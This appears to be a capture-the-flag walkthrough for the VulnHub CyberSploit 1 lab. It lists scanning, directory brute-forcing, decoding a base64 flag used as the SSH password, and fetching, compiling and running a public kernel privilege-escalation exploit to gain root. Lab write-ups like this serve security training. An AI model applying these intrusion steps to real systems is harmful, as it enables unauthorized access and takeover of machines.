machine link : https://www.vulnhub.com/entry/cybersploit-1,506/ step1 : USE netdiscover or arp-scan -l ------ to get the ip of the machine from the network step2 : USE nmap -T4 -sCV -p- 192.168.0.103 -vv -Pn ------ to get the open ports of the machine FINDING : port 80 http is open port 22 ssh is open ssh version OpenSSH 5.9p1 step3 : open the ip in the browser ------the site will open step4 : explore the site and view the sourse ------ at the bottom you will get the user name itsskv step5 : RUN gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirbuster/directory-list- 2.3- medium.txt ------ you will get a /robots file open it ------ http://192.168.0.103/robots - ----- you will get a hash R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9 step6 : OPEN http://hashes.com or and https://www.base64decode.org/ ------ to crack the hash ------ you will get the result Flag1: cybersploit{youtube.com/c/cybersploit} step7 : login with ------ ssh [email protected] -p 22 ------ with pwd : cybersploit{youtube.com/c/cybersploit} step8 : Inside ssh use whoami to find the user name ------ you will get ------ itsskv@cybersploit- CTF:~$ step9 : Use command uname -r ------ to find the kernel version ------ you will get ------ 3.13.0-32- generic step10: Open new terminal and type ------ searchsploit 3.13.0 ------ to find the exploit name ------ you will get ------ Linux Kernel 3.13.0 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Privilege | linux/local/37292.c ------ search it google step11: In here https://www.exploit-db.com/exploits/37292 step12: In existing ssh cd /home/itsskv and vi exploit.c ------it will open text editor step13: press i to enter and paste the exploit code , hit enter key and press esc key and press :wq and hit enter and check with ls step14: Now compile the exploit with gcc exploit.c -o dirtycow.c -pthread and after that chmod +x dirtycow.c and then run the exploit with ./dirtycow.c step15: Now write command whoami if all went good you will be root